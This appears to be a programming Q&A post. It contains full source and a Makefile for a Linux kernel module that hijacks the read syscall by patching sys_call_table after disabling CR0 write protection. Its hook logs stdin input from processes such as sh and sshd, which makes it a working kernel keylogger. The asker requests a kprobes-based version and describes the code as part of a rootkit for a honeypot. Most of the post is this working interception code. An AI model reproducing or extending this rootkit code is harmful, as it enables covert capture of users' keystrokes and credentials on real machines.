# Best practice lkm to hijack inputs, is there lawful method?

Tags: c, linux-kernel, kernel-module

This is working sample of hijacking user's input via overriding kernel's syscall `read`.

https://pastebin.com/K9zcSXrQ

```
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/syscalls.h>
#include <linux/version.h>
#include <linux/unistd.h>
#include <linux/time.h>
#include <linux/preempt.h>
#include <linux/delay.h>
#include <linux/cred.h>
#include <linux/sched.h>

#include <linux/device.h>
#include <linux/mutex.h>
#include <linux/types.h>
#include <linux/kfifo.h>

#include <linux/kobject.h>
#include <linux/sysfs.h>

#include <asm/uaccess.h>
#include <asm/paravirt.h>
#include <asm-generic/bug.h>
#include <asm/segment.h>
#include <asm/atomic.h>
#include <asm/ptrace.h>

#define PID_MAX 4194305

#define MODULE_NAME "hacked_read"

#define dbg( format, arg... )  do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
#define err( format, arg... )  pr_err(  MODULE_NAME ": " format, ## arg )
#define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
#define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )

MODULE_DESCRIPTION( MODULE_NAME );
MODULE_VERSION( "0.4" );
MODULE_LICENSE( "GPL" );
MODULE_AUTHOR( "module author <mail@domain.com>" );

static bool debug = false;
static DEFINE_SPINLOCK( mLock );
static unsigned long ( *original_read )  ( const struct pt_regs *regs );
void **sct;
static unsigned long flags; // irq flags

static atomic_t LOCK_NUMBER_ATOM        = ATOMIC_INIT(0);
static unsigned long long LOCK_NUMBER_ATOM_VAL;
static bool pids[ PID_MAX ];
static bool FORCE_EXIT = false; // force exit via method.

// ---------- force-exit handler -----
static struct kobject *force_exit_kobject;

static ssize_t foo_store(struct  kobject *kobj, struct kobj_attribute *attr, const char *buf, size_t count) {
    if ( strstr( buf, "exit" ) ) {
        FORCE_EXIT = true;
        info( "Force exit method. ");
    }
    return count;
}

static struct kobj_attribute foo_attribute = __ATTR( foo, S_IRUGO | S_IWUSR, NULL, foo_store );

// -------------- asm inserts -------------
static inline void rw_enable( void ) {
    asm volatile ( "pushq %rax \n"
        "movq %cr0, %rax \n"
        "andq $0xfffffffffffeffff, %rax \n"
        "movq %rax, %cr0 \n"
        "popq %rax " );
}

static inline uint64_t getcr0(void) {
    register uint64_t ret = 0;
    asm volatile (
        "movq %%cr0, %0\n"
        :"=r"(ret)
    );
    return ret;
}

static inline void rw_disable( register uint64_t val ) {
    asm volatile(
        "movq %0, %%cr0\n"
        :
        :"r"(val)
    );
}

static void* find_sym( const char *sym ) {
    static unsigned long faddr = 0; // static !!!
    // ----------- nested functions are a GCC extension ---------
    int symb_fn( void* data, const char* sym, struct module* mod, unsigned long addr ) {
        if( 0 == strcmp( (char*)data, sym ) ) {
            faddr = addr;
            return 1;
        } else return 0;
    };// --------------------------------------------------------
    kallsyms_on_each_symbol( symb_fn, (void*)sym );
    return (void*)faddr;
}

static unsigned long hacked_read_test( const struct pt_regs *regs ) {
    unsigned long r;
    unsigned long cp_user_flag;
    unsigned long fd;
    unsigned long strnlen_user_val;
    unsigned long count;
    static char tmp_buffer[ 1 ];
    atomic_inc( &LOCK_NUMBER_ATOM );
    pids[ task_pid_nr( current ) ] = true;
    r = original_read( regs );
    // injection:
    if ( r > 0 ) {
        fd = regs->di;
        if ( fd == 0 ) { // fd == 0 --> stdin (sh, sshd)
            strnlen_user_val = strnlen_user( (char*) regs->si, 1 );
            count = regs->dx;
            dbg( "strnlen_user_val: %lu\n", strnlen_user_val );
            if ( strnlen_user_val > 0 && count > 0 ) {
                if ( strnlen_user_val > 1 ) strnlen_user_val = 1;
                cp_user_flag = copy_from_user( tmp_buffer, (char*) regs->si, strnlen_user_val );
                if ( cp_user_flag == 0 ) {
                    info( "tmp_buffer: %s\n", tmp_buffer );
                }
            }
        }
    }
    atomic_dec( &LOCK_NUMBER_ATOM );
    pids[ task_pid_nr( current ) ] = false;
    return r;
}

int hacked_read_init( void ) {
    register uint64_t cr0;
    int cpu;
    int error = 0;
    sct = find_sym( "sys_call_table" );
    original_read = (void *)sct[ __NR_read ];
    for_each_present_cpu( cpu ) {
        spin_lock_irqsave( &mLock, flags );
        cr0 = getcr0( );
        rw_enable( );
        sct[ __NR_read ] = hacked_read_test;
        rw_disable( cr0 );
        spin_unlock_irqrestore( &mLock, flags );
    }
    force_exit_kobject = kobject_create_and_add( "hacked_read_force_exit", kernel_kobj );
    if( ! force_exit_kobject ) return -ENOMEM;
    error = sysfs_create_file( force_exit_kobject, &foo_attribute.attr );
    if ( error ) info( "failed to create the foo file in /sys/kernel/hacked_read_force_exit \n" );
    info( "Module was loaded\n" );
    return 0;
}

void hacked_read_exit( void ) {
    register uint64_t cr0;
    int cpu;
    unsigned int i;
    for_each_present_cpu( cpu ) {
        spin_lock_irqsave( &mLock, flags );
        cr0 = getcr0( );
        rw_enable( );
        sct[__NR_read] = original_read;
        rw_disable( cr0 );
        spin_unlock_irqrestore( &mLock, flags );
    }
    LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
    while ( LOCK_NUMBER_ATOM_VAL != 0 ) {
        info( "Locked. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL );
        for( i = 0; i < PID_MAX; i++ ) if ( pids[ i ] ) info( "Locked. pid = %d\n", i );
        msleep( 5000 );
        LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
        if ( FORCE_EXIT ) {
            info( "Force exit. Unload module..." );
            break;
        }
    }
    kobject_put( force_exit_kobject );
    info( "Open. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL);
    info( "Module was unloaded\n" );
}

module_init( hacked_read_init );
module_exit( hacked_read_exit );
```

Makefile:

```
CURRENT = $(shell uname -r)
KDIR = /lib/modules/$(CURRENT)/build
PWD = $(shell pwd)

TARGET = hacked_read
obj-m := $(TARGET).o

default:
        $(MAKE) -C $(KDIR) M=$(PWD) modules

clean:
        @rm -f *.o .*.cmd .*.flags *.mod.c *.order
        @rm -f .*.*.cmd *.symvers *~ *.*~ TODO.*
        @rm -fR .tmp*
        @rm -rf .tmp_versions
```

I've read a lot stackoverflow on topic, and find such interesting opinion:

> Why do you have to implement a syscall? 99% of the time, it's the wrong way to achieve whatever you're trying to do.

it is from [here](https://stackoverflow.com/questions/58512430/how-to-write-to-protected-pages-in-the-linux-kernel).

And now, I'm looking for the way to do the same hijack without syscall, is there?
May be kind of kernel-debug mechanism, something like `kprobes` might give me the same result much more safer than current raw override of syscall.
Could somebody give me working sample, please?

In other words, I'm looking for the lawful method, not a hack.

Comment: Do you really need to intercept the `read` _syscall_? Could you use a [shared] library that is injected via the `LD_PRELOAD` environment variable and defines/intercepts the `read` libc _function_ (usually in conjunction with `dlopen` et. al. from `-ldl`)?

Comment: I'm planning to build kind of honeypot, so this code is part of rootkit. Probably, rootkit might hide libc modification in your scenario... It is interesting, thanks.